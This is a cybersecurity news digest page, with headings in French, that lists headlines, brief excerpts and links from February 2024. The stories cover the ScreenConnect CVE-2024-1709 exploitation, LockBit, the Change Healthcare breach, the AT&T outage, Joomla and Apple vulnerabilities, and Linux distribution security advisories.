L'Actu de la presse spécialisée

ConnectWise ScreenConnect Mass Exploitation Delivers Ransomware
Hundreds of initial access brokers and cybercrime gangs are jumping on the max-critical CVE-2024-1709 authentication bypass, threatening orgs and downstream customers.
https://www.darkreading.com/remote-workforce/connectwise-screenconnect-mass-exploitation-delivers-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Alarm Over GenAI Risk Fuels Security Spending in Middle East & Africa
Organizations boost cybersecurity budgets to tackle data-privacy and cloud-security threats amid speedy adoption of generative AI.
https://www.darkreading.com/cybersecurity-operations/alarm-over-generative-ai-fuels-security-spending-in-middle-east-africa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fostering Collaboration for Standardized Threat Investigation & Response
Working together can bring much-needed trust to the industry and help safeguard people, organizations, and government — now and in the future.
https://www.darkreading.com/cybersecurity-operations/fostering-collaboration-standardized-threat-investigation-response
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Can ‘Disproportionately' Help Defend Against Cybersecurity Threats, Google CEO Sundar Pichai Says
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full CNBC Story Sausalito, Calif. – Feb. 23, 2024 CNBC reports that rapid developments in artificial intelligence could help strengthen defenses against security threats in cyberspace, according to Google CEO Sundar Pichai. Amid growing The post AI Can ‘Disproportionately' Help Defend Against Cybersecurity Threats, Google CEO Sundar Pichai Says appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ai-can-disproportionately-help-defend-against-cybersecurity-threats-google-ceo-sundar-pichai-says/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U-Haul says hacker accessed customer records using stolen creds
U-Haul has started informing customers that a hacker used stolen account credentials to access an internal system for dealers and team members to track customer reservations. [...]
https://www.bleepingcomputer.com/news/security/u-haul-says-hacker-accessed-customer-records-using-stolen-creds/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Update now! ConnectWise ScreenConnect vulnerability needs your attention
ConnectWise customers need to take immediate action to remediate a critical vulnerability.
https://www.malwarebytes.com/blog/news/2024/02/update-now-connectwise-screenconnect-vulnerability-needs-your-attention
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows Photos gets AI magic eraser on Windows 10 and later
Microsoft's Windows Photos app now has its own generative erase tool that enables users to replace unwanted objects with AI-generated content. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-photos-gets-ai-magic-eraser-on-windows-10-and-later/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deepfake Threat: Deceptive Content Undermines Election Integrity
By Deeba Ahmed In 2024, over 60 countries worldwide are holding elections. The most significant threat to the integrity of these elections? Deepfake videos, readily accessible on the dark web and Telegram, with prices ranging from as low as to 0. This is a post from HackRead.com Read the original post: Deepfake Threat: Deceptive Content Undermines Election Integrity
https://www.hackread.com/deepfake-threat-content-risk-election-integrity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber security governance: the role of the board
As cyber threats evolve, boards must remain vigilant in cyber security governance.
https://www.ncsc.gov.uk/blog-post/cyber-security-governance-the-role-of-the-board
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Missed IWCON 2023? Catch Recorded Expert Sessions Here (Pt. 2)
Hello hackerMissed attending IWCON 2023 — the biggest virtual cybersecurity conference of the world?No worries, we're here at your service with a second chance.Over the next few weeks, we'll be sharing links to watch recordings of all our expert sessions.Dylan AyreySpeaker bio: Security researcher, public speaker and founder of Truffle SecurityTopic name: Google Oauth is broken; keep access after leaving.Follow the speaker on Twitter.Video linkWatch video hereSaikrishna BudamguntaSpeaker bio: Ex-IRS | Founder @ Saptang Labs, Divsight Intelligence, Maitravaruna & Pinaca Technologies.Topic name: Understanding Chinese Cyber ThreatsFollow the speaker on Twitter.Video linkWatch video hereAbhay BhargavSpeaker bio: Founder and Chief Research Officer of AppSecEngineer.Topic...
https://infosecwriteups.com/missed-iwcon-2023-catch-recorded-expert-sessions-here-pt-2-27237d02cfbf?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains
RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.Features Automated scanning of domains and subdomains for exposed .git repositories. Streamlines the detection of sensitive data exposures. User-friendly command-line interface. Ideal for security audits and Bug Bounty. Installation Clone the repository and install the required dependencies: git clone https://github.com/YourUsername/RepoReaper.gitcd RepoReaperpip...
http://www.kitploit.com/2024/02/reporeaper-automated-tool-crafted-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LockBit Gang Money Flow Uncovered : New Strain Under Development
Over the past few years, LockBit, a ransomware-as-a-service (RaaS) operation, has been linked to multiple security incidents affecting organizations worldwide. Yet, they appear to have experienced a lot of logistical, technological, and reputational issues recently. Due to this, LockBit had to decide to act and begin developing a much-needed version of their malware. The new version […] The post LockBit Gang Money Flow Uncovered : New Strain Under Development appeared first on Cyber Security News.
https://cybersecuritynews.com/lockbit-gang-new-ransomware-version/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ScreenConnect Security Flaw Exploited In The Wild By Attackers
The ScreenConnect software is a popular choice for remote access among organizations worldwide. However, recent vulnerabilities have raised concerns about potential exploitation by attackers. Specifically, these vulnerabilities could allow attackers to access vulnerable instances and distribute ransomware or other malicious payloads to downstream clients. ConnectWise has issued an urgent notification to users of its ScreenConnect remote […] The post ScreenConnect Security Flaw Exploited In The Wild By Attackers appeared first on Cyber Security News.
https://cybersecuritynews.com/screenconnect-vulnerability-exploitation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MIWIC24: Plexal Alumni Receive Multiple Nominations From Peers at This Year's Awards
Plexal work with some of the UK’s most exciting start-ups, entrepreneurs and scale-ups who are building emerging technologies and operating across multiple sectors. Plexal help build community, foster talent, and launch graduating companies and professionals into success. They work in conjunction with the government and industry to deliver programmes that support the next generation of […] The post MIWIC24: Plexal Alumni Receive Multiple Nominations From Peers at This Year's Awards first appeared on IT Security Guru. The post MIWIC24: Plexal Alumni Receive Multiple Nominations From Peers at This Year’s Awards appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/23/miwic24-plexal-alumni-receive-multiple-nominations-from-peers-at-this-years-awards/?utm_source=rss&utm_medium=rss&utm_campaign=miwic24-plexal-alumni-receive-multiple-nominations-from-peers-at-this-years-awards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber Mindfulness Corner Company Spotlight: Jamf
At the IT Security Guru we're showcasing organisations that are passionate about making cybersecurity a healthier, more mindful industry. This week, Aaron Webb, Senior Product Marketing Manager at Jamf, spoke to the Gurus about how leaders can approach the burnout crisis in cybersecurity, what the future of the industry looks like if nothing changes, and why […] The post Cyber Mindfulness Corner Company Spotlight: Jamf first appeared on IT Security Guru. The post Cyber Mindfulness Corner Company Spotlight: Jamf appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/23/cyber-mindfulness-corner-company-spotlight-jamf/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-mindfulness-corner-company-spotlight-jamf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

UnitedHealth confirms Optum hack behind US healthcare billing outage
Healthcare giant UnitedHealth Group confirmed that its subsidiary Optum was forced to shut down IT systems and various services after a cyberattack by "nation-state" hackers on the Change Healthcare platform. [...]
https://www.bleepingcomputer.com/news/security/unitedhealth-confirms-optum-hack-behind-us-healthcare-billing-outage/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SUSE: 2024:0595-1 important: python310
* bsc#1210638 Cross-References: * CVE-2023-27043
https://linuxsecurity.com/advisories/suse/suse-2024-0595-1-important-python310-vefvse3bcnwy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Smart devices: using them safely in your home
Many everyday items are now connected to the internet: we explain how to use them safely.
https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New SSH-Snake Malware Abuses SSH Credentials To Spread Itself In The Network
Threat actors abuse SSH credentials to gain unauthorized access to systems and networks. By exploiting weak or compromised credentials, they can execute malicious activities. SSH credential abuse provides a stealthy entry point for threat actors to compromise and control the targeted systems. On January 4th, 2024, the Sysdig Threat Research Team (TRT) discovered a network […] The post New SSH-Snake Malware Abuses SSH Credentials To Spread Itself In The Network appeared first on Cyber Security News.
https://cybersecuritynews.com/snake-malware-abuses-ssh/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Debian: DSA-5629-1: chromium security update
Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.
https://linuxsecurity.com/advisories/debian/debian-dsa-5629-1-chromium-security-update-te7ffyqxxrvz
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Online Scams: Are You Safe From Impersonation, Blackmails, and Deception?
We are connected to the digital world that provides us with numerous utilities and entertainment, but sometimes it presents us with undesirable encounters. Online frauds and scams are examples of such encounters. Online scams are not simply at the level of disrupting individuals’ daily lives like mass-marketed commercial spam emails. Scamming is a serious cybercrime that inflicts long-term damage both financially and psychologically, and leaves tremendous scars on the victims’ lives. When companies are affected by scams, it can cause... The post Online Scams: Are You Safe From Impersonation, Blackmails, and Deception? appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61976/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
What is the Vulnerability? On February 19, 2024, ConnectWise published a security advisory for their remote desktop application software called ScreenConnect. One of the flaws, CVE-2024-1709 is an authentication bypass vulnerability that could let attackers gain administrative access to a ScreenConnect instance. That vulnerability has a public proof-of-concept (PoC) available and recently been added to CISA's known exploited catalog. The second flaw tracked as CVE-2024-1708 is a path traversal vulnerability that may allow an attacker to execute remote code. What is the Vendor Solution? ConnectWise has released a patch covering both vulnerabilities. [ Link ] What FortiGuard Coverage is available? FortiGuard Labs is currently investigating related protections and will update as...
https://fortiguard.fortinet.com/threat-signal-report/5389
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 38: pdns-recursor 2024-4e36df9dfd
Update to latest upstream. Fixes CVE-2023-50387 and CVE-2023-50868
https://linuxsecurity.com/advisories/fedora/fedora-38-pdns-recursor-2024-4e36df9dfd-8sgxfea2zr02
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 39: firefox 2024-bc8ea2c2cb
New upstream release (123.0)
https://linuxsecurity.com/advisories/fedora/fedora-39-firefox-2024-bc8ea2c2cb-exy0g6agm4wa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 39: chromium 2024-4adf990562
update to 122.0.6261.57 High CVE-2024-1669: Out of bounds memory access in Blink High CVE-2024-1670: Use after free in Mojo Medium CVE-2024-1671: Inappropriate implementation in Site Isolation Medium CVE-2024-1672: Inappropriate implementation in Content Security Policy
https://linuxsecurity.com/advisories/fedora/fedora-39-chromium-2024-4adf990562-qtwfq5unaai6
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 39: pdns-recursor 2024-b0f9656a76
Update to latest upstream. Fixes CVE-2023-50387 and CVE-2023-50868
https://linuxsecurity.com/advisories/fedora/fedora-39-pdns-recursor-2024-b0f9656a76-da2mfhnyv9da
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CISA orders federal agencies to fix ConnectWise ScreenConnect bug in a week
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ConnectWise ScreenConnect bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a ConnectWise ScreenConnect vulnerability, tracked as CVE-2024-1709, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an authentication bypass vulnerability issue that an attacker with network access to the […]
https://securityaffairs.com/159511/hacking/cisa-connectwise-screenconnect-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)
AhnLab SEcurity intelligence Center (ASEC) recently discovered that malware strains are downloaded into systems when users try to download security programs from a Korean construction-related association’s website. Login is required to use the website’s services, and various security programs must be installed to log in. Among the programs that must be installed for login, one of the installers had malware strains inside. When the user downloads and installs the installer, the malware strains are also installed along with the security... The post TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61934/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Intruders in the Library: Exploring DLL Hijacking
Dynamic-link library (DLL) hijacking remains a popular technique to run malware. We address its evolution using examples from the realm of cybercrime and more. The post Intruders in the Library: Exploring DLL Hijacking appeared first on Unit 42.
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu de la presse

AT&T outage sparks concerns of the impact of a possible cyberattack - WPBF
... CYBER ATTACK, BUT SENATOR MARCO RUBIO POSTED ON SOCIAL MEDIA THAT THIS WAS A SMALL TASTE OF WHAT A CYBER ATTACK WOULD LOOK LIKE, AFFECTING YOUR ...
https://www.wpbf.com/article/florida-att-outage-cyber-attack-concerns-outrage/46917374
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T says outage not caused by cyberattack - The Hill
... cyber attack,” the ... cyber attack,” the company said in a post on X, formerly Twitter. “We are continuing our assessment to ensure we keep delivering ...
https://thehill.com/policy/technology/4484745-att-outage-not-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T outage sparks concerns of the impact of a possible cyber attack - YouTube
AT&T outage sparks concerns of the impact of a possible cyber attack Subscribe to WPBF on YouTube now for more: http://bit.ly/1qfxvbX Get more ...
https://www.youtube.com/watch%3Fv%3Dn-tYP76OiXk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Warwick Smiles Dental Clinic targeted by 'malicious' cyber attack last year
A Southern Downs healthcare centre has reportedly become victim to a 'malicious' crypto virus cyber attack, with customers urged to stay vigilant ...
https://www.couriermail.com.au/news/queensland/warwick/warwick-smiles-dental-clinic-targeted-by-malicious-cyber-attack-last-year/news-story/bc609079209cd7cc8c206a175f852187
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Framwellgate School, Durham, lost 40GB data in cyber attack | The Northern Echo
Framwellgate school in County Durham lost 40 gigabytes of data in a cyber attack, the Police and Crime Commissioner (PCC) has revealed.
https://www.thenorthernecho.co.uk/news/24138324.framwellgate-school-durham-lost-40gb-data-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Earnings call: Clorox outlines growth strategy amid recent cyber attack - Investing.com
The company has made significant progress in recovering from a cyber attack, aiming for full recovery and continued growth. Clorox is committed to ...
https://www.investing.com/news/stock-market-news/earnings-call-clorox-outlines-growth-strategy-amid-recent-cyber-attack-93CH-3312772
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T outage sparks FBI cyber attack investigation - Cyber Daily
The US' largest telco, AT&T, has suffered a major network outage, sparking concerns that a cyber attack may be the cause.
https://www.cyberdaily.au/security/10226-at-t-outage-sparks-fbi-cyber-attack-investigation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CISA & FBI Shares Cyber Attack Defenses for Securing Water Systems - GBHackers
... cyber attack targeting water management systems. The guide provides detailed instructions on how to identify, respond to, and recover from such ...
https://gbhackers.com/cisa-fbi-cyber-defenses-water-systems/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Life after a cyber attack: How organisations can be supported to come back stronger
Life after a cyber attack: How organisations can be supported to come back stronger ... Most of us acknowledge that if we were robbed while walking down ...
https://futurescot.com/life-after-a-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malawi's passport system gets compromised by cyber-attack - ITWeb Africa
Malawi's passport system gets compromised by cyber-attack ... President Lazarus Chakwera. President Lazarus Chakwera this week announced a major breach ...
https://itweb.africa/content/mQwkoM6YRVn73r9A
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Was 13 hour mobile service outage in US a cyber attack? White House responds
Thousands who were left without network for over 13 hours from 4.30am to 2.15pm wondered if it was a cyber attack.
https://www.hindustantimes.com/world-news/us-news/was-mobile-service-outage-in-us-a-cyber-attack-as-conspiracy-theories-float-white-house-responds-initiates-probe-101708663448640.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T tells 3News its network outage 'was not a cyber attack' - WKYC
... that impacted more than 70000 customers on Thursday, although the company told 3News it was 'not a cyber attack.'
https://www.wkyc.com/article/tech/att-3news-network-outage-not-a-cyber-attack/95-b59d26cc-72ec-4f4a-98c2-f250dc20d2b1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu de la veille (Presse spécialisée)

Pharmacy Delays Across US Blamed on Nation-State Hackers
Healthcare tech provider Change Healthcare says a suspected nation-state threat actor breached its systems, causing pharmacy transaction delays nationwide.
https://www.darkreading.com/cyberattacks-data-breaches/pharmacy-delays-across-us-blamed-on-nation-state-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hubris May Have Contributed to Downfall of Ransomware Kingpin LockBit
The most prolific ransomware group in recent years was on the decline at the time of its takedown, security researchers say.
https://www.darkreading.com/cyberattacks-data-breaches/hubris-may-have-caused-lockbit-s-downfall
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FTC charged Avast with selling users' browsing data to advertising companies
US FTC charged cyber security firm Avast with harvesting consumer web browsing data through its browser extension and antivirus and sold it. The US Federal Trade Commission (FTC) has filed charges against cybersecurity firm Avast, accusing it of collecting and selling consumer web browsing data gathered through its browser extension and antivirus services. The antivirus […]
https://securityaffairs.com/159499/digital-id/ftc-charged-avast.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NSA Cybersecurity Director Rob Joyce to Retire
His retirement will go into effect on March 31, concluding 34 years of service to the National Security Agency.
https://www.darkreading.com/cybersecurity-operations/nsa-cybersecurity-director-rob-joyce-to-retire
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft has started testing Wi-Fi 7 support in Windows 11
Microsoft is testing support for Wi-Fi 7 in Windows 11, which offers multi-gigabit speeds and improved throughput, latency, and reliability compared to previous Wi-Fi generations. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-has-started-testing-wi-fi-7-support-in-windows-11/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

iSoon's Secret APT Status Exposes China's Foreign Hacking Machinations
Chinese government agencies are paying an APT, masked as a legitimate company, to spy on foreign and domestic targets of political interest.
https://www.darkreading.com/threat-intelligence/-isoon-contractor-helps-the-prc-hack-foreign-governments-companies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Insurers Use Claims Data to Recommend Cybersecurity Technologies
Policy holders using certain technologies — such as managed detection and response (MDR) services, Google Workspace, and email security gateways — gain premium discounts from cyber insurers.
https://www.darkreading.com/cyber-risk/insurers-claims-data-recommend-cybersecurity-technologies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft now force installing Windows 11 23H2 on eligible PCs
Microsoft has started force installing Windows 11 23H2 on eligible devices that have reached or are close to their end-of-servicing date. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-now-force-installing-windows-11-23h2-on-eligible-pcs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zero-Click Apple Shortcuts Vulnerability Allows Silent Data Theft
Vulnerability CVE-2024-23204, affecting Apple's popular Shortcuts app, suggests a critical need for ongoing security awareness in the macOS and iOS ecosystem.
https://www.darkreading.com/application-security/zero-click-apple-shortcuts-vulnerability-allows-silent-data-theft
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian Cyberattackers Launch Multiphase PsyOps Campaign
Operation Texonto spanned several months, using various Russian propaganda lures and spear-phishing to misinform and trick users into giving up Microsoft 365 credentials.
https://www.darkreading.com/remote-workforce/russian-cyberattackers-launch-multi-phase-psyops-campaign
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

“Beyond the border scam”, pay attention to the instance of the new Nigerian fraud
Security researcher Salvatore Lombardo shared details about a new instance of Nigerian fraud that he called ‘Beyond the border scam.’ The 419 scam is a form of scam that requires the recipient to pay an upfront sum to receive a much larger reward later. The name derives from article 419 of the Nigerian penal code which punishes […]
https://securityaffairs.com/159491/cyber-crime/beyond-the-border-scam-nigerian-fraud.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bitwarden's new auto-fill option adds phishing resistance
The Bitwarden open-source password management service has introduced a new inline auto-fill menu that addresses the risk of user credentials being stolen through malicious form fields. [...]
https://www.bleepingcomputer.com/news/security/bitwardens-new-auto-fill-option-adds-phishing-resistance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Address CISA Attestation
Get details on the CISA Attestation, how to address it, and how Legit can help.
https://www.legitsecurity.com/blog/how-to-address-cisa-attestation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New ScreenConnect RCE flaw exploited in ransomware attacks
Attackers are exploiting a maximum severity authentication bypass vulnerability to breach unpatched ScreenConnect servers and deploy LockBit ransomware payloads on compromised networks. [...]
https://www.bleepingcomputer.com/news/security/new-screenconnect-rce-flaw-exploited-in-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T Outage Disrupts Service for Millions of Users Across US
By Waqas You are not alone, an AT&T outage is happening across the United States, and the company is working… This is a post from HackRead.com Read the original post: AT&T Outage Disrupts Service for Millions of Users Across US
https://www.hackread.com/atampt-outage-disrupts-service-in-united-states/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Seccomp Profiles Can Improve Kubernetes Security
Seccomp , which comes from "secure computing mode," is a built-in security feature in the Linux kernel that limits the system calls a process can make. Seccomp profiles in Kubernetes help minimize attack surfaces and prevent malicious code execution.
https://linuxsecurity.com/news/cloud-security/seccomp-profiles-kubernetes-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Joomla XSS Bug Puts Millions of Websites at Risk of RCE
A critical security vulnerability has been found in the popular Joomla open-source content management system that has left millions of websites open to the risk of remote code execution (RCE) due to multiple cross-site scripting (XSS) bugs. The vulnerability is linked to a fundamental flaw in Joomla's core filter component and is tracked as CVE-2024-21726 .
https://linuxsecurity.com/news/security-vulnerabilities/joomla-xss-bug
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!
By Waqas Another day, another Apple Security Vulnerability! This is a post from HackRead.com Read the original post: Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!
https://www.hackread.com/apple-shortcuts-vulnerability-exposed-data-update/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

UOB, Samsung Back Singapore's Startale Labs in Million Web3 Push
By Owais Sultan Startale Labs, the developer behind Japan’s leading Web3 products like Astar Network and Startale Web3 Cloud, has secured… This is a post from HackRead.com Read the original post: UOB, Samsung Back Singapore’s Startale Labs in Million Web3 Push
https://www.hackread.com/uob-samsung-back-startale-labs-web3-push/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FTC to ban Avast from selling browsing data for advertising purposes
The U.S. Federal Trade Commission (FTC) will order Avast to pay .5 million and ban the company from selling the users' web browsing data or licensing it for advertising purposes. [...]
https://www.bleepingcomputer.com/news/security/ftc-to-ban-avast-from-selling-browsing-data-for-advertising-purposes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why ransomware gangs love using RMM tools—and how to stop them
More and more ransomware gangs are using RMM tools in their attacks.
https://www.malwarebytes.com/blog/business/2024/02/why-ransomware-gangs-love-using-rmm-tools-and-how-to-stop-them
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Massive AT&T outage impacts US mobile subscribers
Tens of thousands of U.S. customers from Verizon, T-Mobile, and AT&T have been complaining about lack of wireless service or interruptions on Thursday morning. [...]
https://www.bleepingcomputer.com/news/mobile/massive-atandt-outage-impacts-us-mobile-subscribers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Analyse Crypto Malware in ANY.RUN Sandbox ?
ANY.RUN, an interactive malware sandbox, has published a comprehensive analysis of the growing threat that crypto-malware poses in a time when it is more important than ever to have strong digital security. This malicious software, designed to covertly mine cryptocurrency using infected devices’ processing power, represents a significant shift in the cyber threat landscape. Let’s […] The post How to Analyse Crypto Malware in ANY.RUN Sandbox ? appeared first on Cyber Security News.
https://cybersecuritynews.com/how-to-analyse-crypto-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Multiple XSS flaws in Joomla can lead to remote code execution
Joomla maintainers have addressed multiple vulnerabilities in the popular content management system (CMS) that can lead to execute arbitrary code. The maintainers of the Joomla! Project released Joomla 5.0.3 and 4.4.3 versions that addressed the following vulnerabilities in the popular content management system (CMS): The impact of these flaws can be widespread because roughly 2% of […]
https://securityaffairs.com/159487/security/joomla-xss-flaws.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

4 Key Steps to Reevaluate Your Cybersecurity Priorities
Amid a spike in attacks, now is a good time for brands to strengthen their cybersecurity strategy.
https://www.darkreading.com/cybersecurity-operations/4-key-steps-to-reevaluate-your-cybersecurity-priorities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Iran-Backed Charming Kitten Stages Fake Webinar Platform to Ensnare Targets
The latest ploy by the APT also known as Charming Cypress targets policy experts in the Middle East, Europe, and the US.
https://www.darkreading.com/vulnerabilities-threats/iran-backed-charming-kitten-stages-fake-webinar-platform-to-ensnare-targets
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bluzelle's Curium App Makes Crypto Earning Effortless
By Uzair Amir Meet Curium by Bluzelle, a new Miner Pool app. This is a post from HackRead.com Read the original post: Bluzelle’s Curium App Makes Crypto Earning Effortless
https://www.hackread.com/bluzelles-curium-app-makes-crypto-earning/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 [https://nvd.nist.gov/vuln/detail/CVE-2024-23204] sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vul
https://www.bitdefender.com/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sonatype Unveils State-of-the-Art Artificial Intelligence Component Detection
In the rapidly evolving world of software development, the adoption of artificial intelligence (AI) and machine learning (ML) is no longer just a trend—it's a revolution.
https://blog.sonatype.com/sonatype-unveils-state-of-the-art-artificial-intelligence-component-detection
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian Government Software Hijacked to Install Konni RAT
A critical cybersecurity incident recently occurred where the Konni Remote Access Trojan (RAT), a highly covert and sophisticated malware that specializes in data exfiltration, infiltrated the software systems of the Russian Government. This incident, uncovered by the German cybersecurity firm DCSO, highlights the ongoing cyber espionage activities targeting Russian entities, including the Ministry of Foreign […] The post Russian Government Software Hijacked to Install Konni RAT appeared first on Cyber Security News.
https://cybersecuritynews.com/konni-rat-russia/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LockBit ransomware secretly building next-gen encryptor before takedown
LockBit ransomware developers were secretly building a new version of their file encrypting malware, dubbed LockBit-NG-Dev - likely a future LockBit 4.0, when law enforcement took down the cybercriminal's infrastructure earlier this week. [...]
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-secretly-building-next-gen-encryptor-before-takedown/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

‘Supply Chain Q&A' Launches On The Cybercrime Magazine Podcast
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the 5-minute Cybercrime Magazine Podcast episode Sausalito, Calif. – Feb. 22, 2024 Cassie Crossley, VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric, a French multinational company that specializes The post ‘Supply Chain Q&A’ Launches On The Cybercrime Magazine Podcast appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/supply-chain-qa-launches-on-the-cybercrime-magazine-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Cybereason ‘True Cost to Business Study 2024' Reveals it Still Doesn't Pay to Pay
Cybereason has today announced the results of their third annual ransomware study, commissioned to better understand the true impact of ransomware to businesses. This global study reveals ransomware attacks are becoming more frequent, effective, and sophisticated: 56 percent of organisations surveyed suffered more than one ransomware attack in the last 24 months. It still ‘doesn't […] The post New Cybereason ‘True Cost to Business Study 2024' Reveals it Still Doesn't Pay to Pay first appeared on IT Security Guru. The post New Cybereason ‘True Cost to Business Study 2024’ Reveals it Still Doesn't Pay to Pay appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/22/new-cybereason-true-cost-to-business-study-2024-reveals-it-still-doesnt-pay-to-pay/?utm_source=rss&utm_medium=rss&utm_campaign=new-cybereason-true-cost-to-business-study-2024-reveals-it-still-doesnt-pay-to-pay
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Leak Shows Business Side of China's APT Menace
A new data leak that appears to have come from one of China's top private cybersecurity firms provides a rare glimpse into the commercial side of China's many state-sponsored hacking groups. Experts say the leak illustrates how Chinese government agencies increasingly are contracting out foreign espionage campaigns to the nation's burgeoning and highly competitive cybersecurity industry.
https://krebsonsecurity.com/2024/02/new-leak-shows-business-side-of-chinas-apt-menace/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple Adds PQ3 post-quantum Encryption for iMessage
